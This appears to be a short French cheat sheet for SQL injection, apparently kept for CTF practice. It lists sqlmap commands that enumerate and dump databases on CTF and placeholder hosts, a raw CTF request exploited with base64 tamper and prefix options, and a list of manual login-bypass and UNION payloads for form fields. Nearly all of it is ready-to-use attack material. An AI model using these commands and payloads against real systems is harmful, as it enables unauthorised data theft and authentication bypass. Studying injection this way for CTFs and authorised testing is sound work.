Table des matières

Découverte de l'outil sqlmap

C'est un outil pour faire des injections de manière automatique :

sqlmap -u page/id=51 --dbs
sqlmap -u page/id=51 --tables -D $bdd
sqlmap -u page/id=51 --columns -D $bdd -T $table
sqlmap -u page/id=51 --dump -D $bdd -T $table -c $columns
sqlmap -u "http://authent-service.insomni.hack/index.php" --method POST --data "username=admin" --level 5 --risk 3 --batch -v 6
sqlmap -u "http://authent-service.insomni.hack/index.php" --data=”login=iron” --method POST -D $BASE --dump all --batch
sqlmap -u "http://domaine.org/ch9/" --threads=4 --batch --data="login=admin&password=1234" --dbs
sqlmap -u "http://domaine.org/ch9/" --threads=4 --batch --data="login=admin&password=1234" --dbms=SQLite --tables
sqlmap -u "http://domaine.org/ch9/" --threads=4 --batch --data="login=admin&password=1234" --dbms=SQLite -D SQLite_masterdb -T users --dump

Autre exemple :

sqlmap -u "http://authent-service.insomni.hack/index.php?champ1=donnee1" --dbms Mysql
sqlmap -u "http://authent-service.insomni.hack/index.php" --data="champ1=donnee1" --dbms Mysql

Vu dans un CTF :

$ cat raw_request
POST /?a=benchmark HTTP/1.1
Host: bitminer.insomni.hack
User-Agent: Bitcoin Mining $couter 0.1 Beta 1337
Expect: 100-continue
Content-Length: 148
Content-Type: application/x-www-form-urlencoded
sqlmap -r raw_request --tamper base64encode --prefix $'{"cid":"NOT-A-SANDBOX","cpu":"Intel(R) Core(TM) i5-4310U CPU @ 2.00GHz","gpu":"\' or 1=1 ' --suffix ' -- a"}' --skip-urlencode --level 5 --string go --technique B --dump

Manuel

Lors de la saison d'un formulaire ces entrées peuvent fonctionner :

' UNION SELECT 1#
' UNION SELECT TABLE_NAME FROM information_schema.tables;--
 
' OR '1'='1
admin';--
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
' OR 1 LIMIT 1,2 --
' OR 1 LIMIT 2,3 --

Documentation